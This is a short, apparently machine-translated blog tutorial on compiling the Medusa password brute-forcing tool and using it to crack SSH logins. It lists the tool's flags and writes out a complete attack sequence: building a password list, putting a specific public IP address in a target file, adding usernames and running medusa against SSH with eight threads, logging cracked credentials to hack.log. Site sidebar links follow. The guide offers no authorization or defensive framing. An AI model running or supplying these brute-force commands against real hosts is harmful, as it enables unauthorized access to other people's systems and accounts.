当前位置:网站首页>Medusa installation and simple use
Medusa installation and simple use
2022-07-05 02:21:00 【Heyue Keyan】
medusa Installation and ease of use
1、 Compile and install manually medusa
yum install openssl-devel libssh2-devel -y # Install dependency packages
tar zxvf medusa-2.2.tar.gz
cd medusa-2.2/
./configure && make -j 4 && make install
2、medusa Parameter description :
-H [File] Include the target host name or IP The file of
-U [File] The user name file that contains the test
-p[File] Contains the password file for the test
-O[File] Log information file , Save the results of brute force cracking
-M[text] Module execution name
-t[num] Set the number of threads
-n[num] Use for non-default TCP port number Specify non 22 Port number , Default 22
3、 Blast ssh
Specify by file host and user,host.txt Is the target host name or IP Address ,user.txt Specify required burst Crack the user name , Use wordlist.txt Dictionary burst .
head -n 20 wordlist.txt > b.txt # take 20 A code , Put it in b.txt. If straight Use this dictionary , It took too long
echo 123456 >> b.txt # Write the correct password
echo 219.143.129.64 > /root/host.txt # Specified burst IP, A line of one .
vim /root/users.txt # Insert the following multiple users
medusa -M ssh -H ./host.txt -U ./users.txt -t 8 -P b.txt -O hack.log
After successful cracking, it will display success word , And put the result of the burst into hack.log in
边栏推荐
- Bert fine tuning skills experiment
- 丸子百度小程序详细配置教程,审核通过。
- Leetcode takes out the least number of magic beans
- Learn tla+ (XII) -- functions through examples
- Advanced learning of MySQL -- Application -- Introduction
- Traditional chips and AI chips
- Pgadmin 4 V6.5 release, PostgreSQL open source graphical management tool
- Summary and practice of knowledge map construction technology
- The perfect car for successful people: BMW X7! Superior performance, excellent comfort and safety
- Matrixone 0.2.0 is released, and the fastest SQL computing engine is coming
猜你喜欢
One plus six brushes into Kali nethunter
Comment mettre en place une équipe technique pour détruire l'entreprise?
【LeetCode】110. Balanced binary tree (2 brushes of wrong questions)
The MySQL team development specifications used by various factories are too detailed. It is recommended to collect them!
LeetCode 314. Binary tree vertical order traversal - Binary Tree Series Question 6
Android advanced interview question record in 2022
CAM Pytorch
R language uses logistic regression and afrima, ARIMA time series models to predict world population
Visual explanation of Newton iteration method
STM32 series - serial port UART software pin internal pull-up or external resistance pull-up - cause problem search
随机推荐
Kotlin - 协程 Coroutine
I use these six code comparison tools
He was laid off.. 39 year old Ali P9, saved 150million
"C zero foundation introduction hundred knowledge and hundred cases" (72) multi wave entrustment -- Mom shouted for dinner
172. Zero after factorial
Data guard -- theoretical explanation (III)
Collection of gmat750 wrong questions
How to find hot projects in 2022? Dena community project progress follow-up, there is always a dish for you (1)
220213c language learning diary
Grpc message sending of vertx
【LeetCode】110. Balanced binary tree (2 brushes of wrong questions)
Blue bridge - maximum common divisor and minimum common multiple
Summary and practice of knowledge map construction technology
[understanding of opportunity -38]: Guiguzi - Chapter 5 flying clamp - warning one: there is a kind of killing called "killing"
100 basic multiple choice questions of C language (with answers) 04
Stored procedure and stored function in Oracle
The phenomenology of crypto world: Pioneer entropy
Erreur de type de datagramme MySQL en utilisant Druid
【LeetCode】222. The number of nodes of a complete binary tree (2 mistakes)
RichView TRVStyle MainRVStyle